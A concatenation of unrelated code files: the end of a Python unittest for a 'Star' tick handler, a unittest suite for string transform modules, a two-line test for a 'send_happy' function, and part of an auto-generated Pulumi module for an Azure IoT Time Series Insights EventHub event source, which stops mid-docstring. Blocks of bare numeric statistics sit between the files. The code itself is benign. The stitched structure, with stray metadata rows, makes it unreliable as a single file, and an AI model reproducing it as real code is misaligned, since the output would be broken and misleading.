commands = self.m_Star.handleTick(); self.assertEquals("fill 1,000000,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,000000,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,000000,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,000000,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,000000,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,000000,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,000000,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,000000,20,1",commands);
commands = self.m_Star.handleTick(); self.assertEquals("fill 1,3f1f0f,20,1",commands);
if __name__ == '__main__':
unittest.main()
| 54.157895
| 88
| 0.733074
| 449
| 3,087
| 4.944321
| 0.095768
| 0.076577
| 0.133784
| 0.237387
| 0.896847
| 0.896847
| 0.896847
| 0.896847
| 0.896847
| 0.896847
| 0
| 0.093862
| 0.092323
| 3,087
| 56
| 89
| 55.125
| 0.69843
| 0
| 0
| 0.642857
| 0
| 0
| 0.185353
| 0
| 0
| 0
| 0
| 0
| 0.738095
| 1
| 0.071429
| false
| 0
| 0.047619
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
65b2e2259023476cfd87115de828b50bdbceee54
| 13,963
|
py
|
Python
|
transforms_tests.py
|
Sylvaner/PyConverter
|
071241c049b13dd891a89ea631f76ff1043100c3
|
[
"Apache-2.0"
] | null | null | null |
transforms_tests.py
|
Sylvaner/PyConverter
|
071241c049b13dd891a89ea631f76ff1043100c3
|
[
"Apache-2.0"
] | null | null | null |
transforms_tests.py
|
Sylvaner/PyConverter
|
071241c049b13dd891a89ea631f76ff1043100c3
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
"""
Test transforms modules.
"""
__author__ = "Sylvain Dangin"
__licence__ = "Apache 2.0"
__version__ = "1.0"
__maintainer__ = "Sylvain Dangin"
__email__ = "sylvain.dangin@gmail.com"
__status__ = "Development"
import os
import sys
import unittest
class TransformsTest(unittest.TestCase):
################################################################################
# Tests first_char transform #
################################################################################
def test_first_char_word(self):
from transforms.first_char import first_char
self.assertEqual('H', first_char.transform('Hello'))
def test_first_char_sentence(self):
from transforms.first_char import first_char
self.assertEqual('H', first_char.transform('Hello the world!!!'))
def test_first_char_only_space(self):
from transforms.first_char import first_char
self.assertEqual(' ', first_char.transform(' '))
def test_first_char_empty_string(self):
from transforms.first_char import first_char
self.assertEqual('', first_char.transform(''))
def test_first_char_not_a_string(self):
from transforms.first_char import first_char
self.assertIsInstance(first_char.transform(['Hello', 'the', 'world']), list)
################################################################################
# Tests first_word transform #
################################################################################
def test_first_word_one_word(self):
from transforms.first_word import first_word
self.assertEqual('Hello', first_word.transform('Hello'))
def test_first_word_sentence(self):
from transforms.first_word import first_word
self.assertEqual('Hello', first_word.transform('Hello the world!!!'))
def test_first_word_multiple_spaces(self):
from transforms.first_word import first_word
self.assertEqual('Hello', first_word.transform('Hello the world!!!'))
def test_first_word_only_spaces(self):
from transforms.first_word import first_word
self.assertEqual('', first_word.transform(' '))
def test_first_word_empty_string(self):
from transforms.first_word import first_word
self.assertEqual('', first_word.transform(''))
def test_first_word_not_a_string(self):
from transforms.first_word import first_word
self.assertIsInstance(first_word.transform(['Hello', 'the', 'world']), list)
################################################################################
# Tests last_word transform #
################################################################################
def test_last_word_one_word(self):
from transforms.last_word import last_word
self.assertEqual('Hello', last_word.transform('Hello'))
def test_last_word_sentence(self):
from transforms.last_word import last_word
self.assertEqual('world', last_word.transform('Hello the world'))
def test_last_word_sentence_with_ponctuation(self):
from transforms.last_word import last_word
self.assertEqual('world', last_word.transform('Hello the world!!!'))
self.assertEqual('world', last_word.transform('Hello the world!'))
self.assertEqual('world', last_word.transform('Hello the world !'))
self.assertEqual('world', last_word.transform('Hello the world ?'))
self.assertEqual('world', last_word.transform('Hello the world.'))
self.assertEqual('world', last_word.transform('Hello the world,'))
self.assertEqual('world', last_word.transform('Hello the world, ?'))
def test_last_word_multiple_spaces(self):
from transforms.last_word import last_word
self.assertEqual('world', last_word.transform('Hello the world'))
def test_last_word_only_spaces(self):
from transforms.last_word import last_word
self.assertEqual('', last_word.transform(' '))
def test_last_word_empty_string(self):
from transforms.last_word import last_word
self.assertEqual('', last_word.transform(''))
def test_last_word_not_a_string(self):
from transforms.last_word import last_word
self.assertIsInstance(last_word.transform(['Hello', 'the', 'world']), list)
################################################################################
# Tests remove_digits transform #
################################################################################
def test_remove_digits(self):
from transforms.remove_digits import remove_digits
self.assertEqual('Hell te wrd', remove_digits.transform('Hell0 t4e w0r1d'))
self.assertEqual('efa', remove_digits.transform('23e99f00a'))
self.assertEqual('', remove_digits.transform('329840912'))
def test_remove_digits_without_digits(self):
from transforms.remove_digits import remove_digits
self.assertEqual('Hello the world', remove_digits.transform('Hello the world'))
def test_remove_digits_only_spaces(self):
from transforms.remove_digits import remove_digits
self.assertEqual(' ', remove_digits.transform(' '))
def test_remove_digits_empty_string(self):
from transforms.remove_digits import remove_digits
self.assertEqual('', remove_digits.transform(''))
def test_remove_digits_not_a_string(self):
from transforms.remove_digits import remove_digits
self.assertIsInstance(remove_digits.transform(['Hello', 'the', 'world']), list)
################################################################################
# Tests remove_last_word transform #
################################################################################
def test_remove_last_word(self):
from transforms.remove_last_word import remove_last_word
self.assertEqual('Hello the', remove_last_word.transform('Hello the world'))
def test_remove_last_word_one_word(self):
from transforms.remove_last_word import remove_last_word
self.assertEqual('', remove_last_word.transform('Hello'))
def test_remove_last_word_with_extra_space(self):
from transforms.remove_last_word import remove_last_word
self.assertEqual('Hello the', remove_last_word.transform('Hello the world '))
self.assertEqual('', remove_last_word.transform('Hello '))
def test_remove_last_word_only_spaces(self):
from transforms.remove_last_word import remove_last_word
self.assertEqual('', remove_last_word.transform(' '))
def test_remove_last_word_empty_string(self):
from transforms.remove_last_word import remove_last_word
self.assertEqual('', remove_last_word.transform(''))
def test_remove_last_word_not_a_string(self):
from transforms.remove_last_word import remove_last_word
self.assertIsInstance(remove_last_word.transform(['Hello', 'the', 'world']), list)
################################################################################
# Tests to_lower transform #
################################################################################
def test_to_lower(self):
from transforms.to_lower import to_lower
self.assertEqual('hello the world', to_lower.transform('Hello the World'))
def test_to_lower_one_word(self):
from transforms.to_lower import to_lower
self.assertEqual('hello', to_lower.transform('Hello'))
def test_to_lower_already_done(self):
from transforms.to_lower import to_lower
self.assertEqual('hello the world', to_lower.transform('hello the world'))
def test_to_lower_only_spaces(self):
from transforms.to_lower import to_lower
self.assertEqual(' ', to_lower.transform(' '))
def test_to_lower_empty_string(self):
from transforms.to_lower import to_lower
self.assertEqual('', to_lower.transform(''))
def test_to_lower_not_a_string(self):
from transforms.to_lower import to_lower
self.assertIsInstance(to_lower.transform(['Hello', 'the', 'world']), list)
################################################################################
# Tests to_upper transform #
################################################################################
def test_to_upper(self):
from transforms.to_upper import to_upper
self.assertEqual('HELLO THE WORLD', to_upper.transform('Hello the World'))
def test_to_upper_one_word(self):
from transforms.to_upper import to_upper
self.assertEqual('HELLO', to_upper.transform('Hello'))
def test_to_upper_already_done(self):
from transforms.to_upper import to_upper
self.assertEqual('HELLO THE WORLD', to_upper.transform('HELLO THE WORLD'))
def test_to_upper_only_spaces(self):
from transforms.to_upper import to_upper
self.assertEqual(' ', to_upper.transform(' '))
def test_to_upper_empty_string(self):
from transforms.to_upper import to_upper
self.assertEqual('', to_upper.transform(''))
def test_to_upper_not_a_string(self):
from transforms.to_upper import to_upper
self.assertIsInstance(to_upper.transform(['Hello', 'the', 'world']), list)
################################################################################
# Tests trim transform #
################################################################################
def test_trim(self):
from transforms.trim import trim
self.assertEqual('Hello the World', trim.transform(' Hello the World '))
def test_trim_one_word(self):
from transforms.trim import trim
self.assertEqual('Hello', trim.transform(' Hello '))
def test_trim_already_done(self):
from transforms.trim import trim
self.assertEqual('hello the world', trim.transform('hello the world'))
def test_trim_only_spaces(self):
from transforms.trim import trim
self.assertEqual('', trim.transform(' '))
def test_trim_empty_string(self):
from transforms.trim import trim
self.assertEqual('', trim.transform(''))
def test_trim_not_a_string(self):
from transforms.trim import trim
self.assertIsInstance(trim.transform(['Hello', 'the', 'world']), list)
################################################################################
# Tests up_all_first_letters transform #
################################################################################
def test_up_all_first_letters(self):
from transforms.up_all_first_letters import up_all_first_letters
self.assertEqual('Hello The World', up_all_first_letters.transform('hello the world'))
self.assertEqual('Hello The World', up_all_first_letters.transform('Hello the world'))
def test_up_all_first_letters_one_word(self):
from transforms.up_all_first_letters import up_all_first_letters
self.assertEqual('Hello', up_all_first_letters.transform('hello'))
def test_up_all_first_letters_already_done(self):
from transforms.up_all_first_letters import up_all_first_letters
self.assertEqual('Hello The World', up_all_first_letters.transform('Hello The World'))
def test_up_all_first_letters_only_spaces(self):
from transforms.up_all_first_letters import up_all_first_letters
self.assertEqual(' ', up_all_first_letters.transform(' '))
def test_up_all_first_letters_empty_string(self):
from transforms.up_all_first_letters import up_all_first_letters
self.assertEqual('', up_all_first_letters.transform(''))
def test_up_all_first_letters_not_a_string(self):
from transforms.up_all_first_letters import up_all_first_letters
self.assertIsInstance(up_all_first_letters.transform(['Hello', 'the', 'world']), list)
################################################################################
# Tests up_first_letter transform #
################################################################################
def test_up_first_letter(self):
from transforms.up_first_letter import up_first_letter
self.assertEqual('Hello the world', up_first_letter.transform('hello the world'))
self.assertEqual('Hello the world', up_first_letter.transform('Hello the world'))
def test_up_first_letter_one_word(self):
from transforms.up_first_letter import up_first_letter
self.assertEqual('Hello', up_first_letter.transform('hello'))
def test_up_first_letter_already_done(self):
from transforms.up_first_letter import up_first_letter
self.assertEqual('Hello the world', up_first_letter.transform('hello the world'))
def test_up_first_letter_only_spaces(self):
from transforms.up_first_letter import up_first_letter
self.assertEqual(' ', up_first_letter.transform(' '))
def test_up_first_letter_empty_string(self):
from transforms.up_first_letter import up_first_letter
self.assertEqual('', up_first_letter.transform(''))
def test_up_first_letter_not_a_string(self):
from transforms.up_first_letter import up_first_letter
self.assertIsInstance(up_first_letter.transform(['Hello', 'the', 'world']), list)
if __name__ == '__main__':
unittest.main()
| 47.172297
| 94
| 0.605386
| 1,534
| 13,963
| 5.159061
| 0.054107
| 0.061663
| 0.134193
| 0.102856
| 0.920394
| 0.884508
| 0.835734
| 0.772176
| 0.749431
| 0.732499
| 0
| 0.002142
| 0.197522
| 13,963
| 295
| 95
| 47.332203
| 0.70415
| 0.05579
| 0
| 0.455
| 0
| 0
| 0.099044
| 0.002085
| 0
| 0
| 0
| 0
| 0.35
| 1
| 0.295
| false
| 0
| 0.31
| 0
| 0.61
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
65ddb64c00be49464455044e58ae18091ad0c8ba
| 129
|
py
|
Python
|
tests/test_all.py
|
AnotherCat/happy-birthday-spam
|
ab21657c33f0345839693dc8bed3efd936361022
|
[
"MIT"
] | null | null | null |
tests/test_all.py
|
AnotherCat/happy-birthday-spam
|
ab21657c33f0345839693dc8bed3efd936361022
|
[
"MIT"
] | null | null | null |
tests/test_all.py
|
AnotherCat/happy-birthday-spam
|
ab21657c33f0345839693dc8bed3efd936361022
|
[
"MIT"
] | null | null | null |
from main import send_happy
def test_send_happy():
assert send_happy(5, 0.0005) == 0.07
assert send_happy(5, 1) == 0.9
| 18.428571
| 40
| 0.674419
| 24
| 129
| 3.416667
| 0.583333
| 0.439024
| 0.365854
| 0.390244
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126214
| 0.20155
| 129
| 6
| 41
| 21.5
| 0.669903
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
65e5408fc42dbb76bd27b80e87eb05170bcde303
| 38,615
|
py
|
Python
|
sdk/python/pulumi_azure/iot/time_series_insights_event_source_eventhub.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/iot/time_series_insights_event_source_eventhub.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/iot/time_series_insights_event_source_eventhub.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['TimeSeriesInsightsEventSourceEventhubArgs', 'TimeSeriesInsightsEventSourceEventhub']
@pulumi.input_type
class TimeSeriesInsightsEventSourceEventhubArgs:
def __init__(__self__, *,
consumer_group_name: pulumi.Input[str],
environment_id: pulumi.Input[str],
event_source_resource_id: pulumi.Input[str],
eventhub_name: pulumi.Input[str],
namespace_name: pulumi.Input[str],
shared_access_key: pulumi.Input[str],
shared_access_key_name: pulumi.Input[str],
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timestamp_property_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a TimeSeriesInsightsEventSourceEventhub resource.
:param pulumi.Input[str] consumer_group_name: Specifies the name of the EventHub Consumer Group that holds the partitions from which events will be read.
:param pulumi.Input[str] environment_id: Specifies the id of the IoT Time Series Insights Environment that the Event Source should be associated with. Changing this forces a new resource to created.
:param pulumi.Input[str] event_source_resource_id: Specifies the resource id where events will be coming from.
:param pulumi.Input[str] eventhub_name: Specifies the name of the EventHub which will be associated with this resource.
:param pulumi.Input[str] namespace_name: Specifies the EventHub Namespace name.
:param pulumi.Input[str] shared_access_key: Specifies the value of the Shared Access Policy key that grants the Time Series Insights service read access to the EventHub.
:param pulumi.Input[str] shared_access_key_name: Specifies the name of the Shared Access key that grants the Event Source access to the EventHub.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Azure IoT Time Series Insights EventHub Event Source. Changing this forces a new resource to be created. Must be globally unique.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] timestamp_property_name: Specifies the value that will be used as the event source's timestamp. This value defaults to the event creation time.
"""
pulumi.set(__self__, "consumer_group_name", consumer_group_name)
pulumi.set(__self__, "environment_id", environment_id)
pulumi.set(__self__, "event_source_resource_id", event_source_resource_id)
pulumi.set(__self__, "eventhub_name", eventhub_name)
pulumi.set(__self__, "namespace_name", namespace_name)
pulumi.set(__self__, "shared_access_key", shared_access_key)
pulumi.set(__self__, "shared_access_key_name", shared_access_key_name)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if timestamp_property_name is not None:
pulumi.set(__self__, "timestamp_property_name", timestamp_property_name)
@property
@pulumi.getter(name="consumerGroupName")
def consumer_group_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the EventHub Consumer Group that holds the partitions from which events will be read.
"""
return pulumi.get(self, "consumer_group_name")
@consumer_group_name.setter
def consumer_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "consumer_group_name", value)
@property
@pulumi.getter(name="environmentId")
def environment_id(self) -> pulumi.Input[str]:
"""
Specifies the id of the IoT Time Series Insights Environment that the Event Source should be associated with. Changing this forces a new resource to created.
"""
return pulumi.get(self, "environment_id")
@environment_id.setter
def environment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "environment_id", value)
@property
@pulumi.getter(name="eventSourceResourceId")
def event_source_resource_id(self) -> pulumi.Input[str]:
"""
Specifies the resource id where events will be coming from.
"""
return pulumi.get(self, "event_source_resource_id")
@event_source_resource_id.setter
def event_source_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "event_source_resource_id", value)
@property
@pulumi.getter(name="eventhubName")
def eventhub_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the EventHub which will be associated with this resource.
"""
return pulumi.get(self, "eventhub_name")
@eventhub_name.setter
def eventhub_name(self, value: pulumi.Input[str]):
pulumi.set(self, "eventhub_name", value)
@property
@pulumi.getter(name="namespaceName")
def namespace_name(self) -> pulumi.Input[str]:
"""
Specifies the EventHub Namespace name.
"""
return pulumi.get(self, "namespace_name")
@namespace_name.setter
def namespace_name(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace_name", value)
@property
@pulumi.getter(name="sharedAccessKey")
def shared_access_key(self) -> pulumi.Input[str]:
"""
Specifies the value of the Shared Access Policy key that grants the Time Series Insights service read access to the EventHub.
"""
return pulumi.get(self, "shared_access_key")
@shared_access_key.setter
def shared_access_key(self, value: pulumi.Input[str]):
pulumi.set(self, "shared_access_key", value)
@property
@pulumi.getter(name="sharedAccessKeyName")
def shared_access_key_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the Shared Access key that grants the Event Source access to the EventHub.
"""
return pulumi.get(self, "shared_access_key_name")
@shared_access_key_name.setter
def shared_access_key_name(self, value: pulumi.Input[str]):
pulumi.set(self, "shared_access_key_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Azure IoT Time Series Insights EventHub Event Source. Changing this forces a new resource to be created. Must be globally unique.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="timestampPropertyName")
def timestamp_property_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the value that will be used as the event source's timestamp. This value defaults to the event creation time.
"""
return pulumi.get(self, "timestamp_property_name")
@timestamp_property_name.setter
def timestamp_property_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "timestamp_property_name", value)
@pulumi.input_type
class _TimeSeriesInsightsEventSourceEventhubState:
def __init__(__self__, *,
consumer_group_name: Optional[pulumi.Input[str]] = None,
environment_id: Optional[pulumi.Input[str]] = None,
event_source_resource_id: Optional[pulumi.Input[str]] = None,
eventhub_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace_name: Optional[pulumi.Input[str]] = None,
shared_access_key: Optional[pulumi.Input[str]] = None,
shared_access_key_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timestamp_property_name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering TimeSeriesInsightsEventSourceEventhub resources.
:param pulumi.Input[str] consumer_group_name: Specifies the name of the EventHub Consumer Group that holds the partitions from which events will be read.
:param pulumi.Input[str] environment_id: Specifies the id of the IoT Time Series Insights Environment that the Event Source should be associated with. Changing this forces a new resource to created.
:param pulumi.Input[str] event_source_resource_id: Specifies the resource id where events will be coming from.
:param pulumi.Input[str] eventhub_name: Specifies the name of the EventHub which will be associated with this resource.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Azure IoT Time Series Insights EventHub Event Source. Changing this forces a new resource to be created. Must be globally unique.
:param pulumi.Input[str] namespace_name: Specifies the EventHub Namespace name.
:param pulumi.Input[str] shared_access_key: Specifies the value of the Shared Access Policy key that grants the Time Series Insights service read access to the EventHub.
:param pulumi.Input[str] shared_access_key_name: Specifies the name of the Shared Access key that grants the Event Source access to the EventHub.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] timestamp_property_name: Specifies the value that will be used as the event source's timestamp. This value defaults to the event creation time.
"""
if consumer_group_name is not None:
pulumi.set(__self__, "consumer_group_name", consumer_group_name)
if environment_id is not None:
pulumi.set(__self__, "environment_id", environment_id)
if event_source_resource_id is not None:
pulumi.set(__self__, "event_source_resource_id", event_source_resource_id)
if eventhub_name is not None:
pulumi.set(__self__, "eventhub_name", eventhub_name)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace_name is not None:
pulumi.set(__self__, "namespace_name", namespace_name)
if shared_access_key is not None:
pulumi.set(__self__, "shared_access_key", shared_access_key)
if shared_access_key_name is not None:
pulumi.set(__self__, "shared_access_key_name", shared_access_key_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if timestamp_property_name is not None:
pulumi.set(__self__, "timestamp_property_name", timestamp_property_name)
@property
@pulumi.getter(name="consumerGroupName")
def consumer_group_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the EventHub Consumer Group that holds the partitions from which events will be read.
"""
return pulumi.get(self, "consumer_group_name")
@consumer_group_name.setter
def consumer_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "consumer_group_name", value)
@property
@pulumi.getter(name="environmentId")
def environment_id(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the id of the IoT Time Series Insights Environment that the Event Source should be associated with. Changing this forces a new resource to created.
"""
return pulumi.get(self, "environment_id")
@environment_id.setter
def environment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "environment_id", value)
@property
@pulumi.getter(name="eventSourceResourceId")
def event_source_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the resource id where events will be coming from.
"""
return pulumi.get(self, "event_source_resource_id")
@event_source_resource_id.setter
def event_source_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "event_source_resource_id", value)
@property
@pulumi.getter(name="eventhubName")
def eventhub_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the EventHub which will be associated with this resource.
"""
return pulumi.get(self, "eventhub_name")
@eventhub_name.setter
def eventhub_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "eventhub_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Azure IoT Time Series Insights EventHub Event Source. Changing this forces a new resource to be created. Must be globally unique.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="namespaceName")
def namespace_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the EventHub Namespace name.
"""
return pulumi.get(self, "namespace_name")
@namespace_name.setter
def namespace_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace_name", value)
@property
@pulumi.getter(name="sharedAccessKey")
def shared_access_key(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the value of the Shared Access Policy key that grants the Time Series Insights service read access to the EventHub.
"""
return pulumi.get(self, "shared_access_key")
@shared_access_key.setter
def shared_access_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "shared_access_key", value)
@property
@pulumi.getter(name="sharedAccessKeyName")
def shared_access_key_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Shared Access key that grants the Event Source access to the EventHub.
"""
return pulumi.get(self, "shared_access_key_name")
@shared_access_key_name.setter
def shared_access_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "shared_access_key_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="timestampPropertyName")
def timestamp_property_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the value that will be used as the event source's timestamp. This value defaults to the event creation time.
"""
return pulumi.get(self, "timestamp_property_name")
@timestamp_property_name.setter
def timestamp_property_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "timestamp_property_name", value)
class TimeSeriesInsightsEventSourceEventhub(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
consumer_group_name: Optional[pulumi.Input[str]] = None,
environment_id: Optional[pulumi.Input[str]] = None,
event_source_resource_id: Optional[pulumi.Input[str]] = None,
eventhub_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace_name: Optional[pulumi.Input[str]] = None,
shared_access_key: Optional[pulumi.Input[str]] = None,
shared_access_key_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timestamp_property_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an Azure IoT Time Series Insights EventHub Event Source.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_event_hub_namespace = azure.eventhub.EventHubNamespace("exampleEventHubNamespace",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="Standard")
example_event_hub = azure.eventhub.EventHub("exampleEventHub",
namespace_name=example_event_hub_namespace.name,
resource_group_name=example_resource_group.name,
partition_count=2,
message_retention=7)
example_consumer_group = azure.eventhub.ConsumerGroup("exampleConsumerGroup",
namespace_name=example_event_hub_namespace.name,
eventhub_name=example_event_hub.name,
resource_group_name=example_resource_group.name)
example_authorization_rule = azure.eventhub.AuthorizationRule("exampleAuthorizationRule",
namespace_name=example_event_hub_namespace.name,
eventhub_name=example_event_hub.name,
resource_group_name=example_resource_group.name,
listen=True,
send=False,
manage=False)
example_account = azure.storage.Account("exampleAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
account_tier="Standard",
account_replication_type="LRS")
example_time_series_insights_gen2_environment = azure.iot.TimeSeriesInsightsGen2Environment("exampleTimeSeriesInsightsGen2Environment",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku_name="L1",
id_properties=["id"],
storage=azure.iot.TimeSeriesInsightsGen2EnvironmentStorageArgs(
name=example_account.name,
key=example_account.primary_access_key,
))
example_time_series_insights_event_source_eventhub = azure.iot.TimeSeriesInsightsEventSourceEventhub("exampleTimeSeriesInsightsEventSourceEventhub",
location=example_resource_group.location,
environment_id=example_time_series_insights_gen2_environment.id,
eventhub_name=example_event_hub.name,
namespace_name=example_event_hub_namespace.name,
shared_access_key=example_authorization_rule.primary_key,
shared_access_key_name=example_authorization_rule.name,
consumer_group_name=example_consumer_group.name,
event_source_resource_id=example_event_hub.id)
```
## Import
Azure IoT Time Series Insights EventHub Event Source can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:iot/timeSeriesInsightsEventSourceEventhub:TimeSeriesInsightsEventSourceEventhub example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/example/providers/Microsoft.TimeSeriesInsights/environments/environment1/eventSources/example
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] consumer_group_name: Specifies the name of the EventHub Consumer Group that holds the partitions from which events will be read.
:param pulumi.Input[str] environment_id: Specifies the id of the IoT Time Series Insights Environment that the Event Source should be associated with. Changing this forces a new resource to created.
:param pulumi.Input[str] event_source_resource_id: Specifies the resource id where events will be coming from.
:param pulumi.Input[str] eventhub_name: Specifies the name of the EventHub which will be associated with this resource.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Azure IoT Time Series Insights EventHub Event Source. Changing this forces a new resource to be created. Must be globally unique.
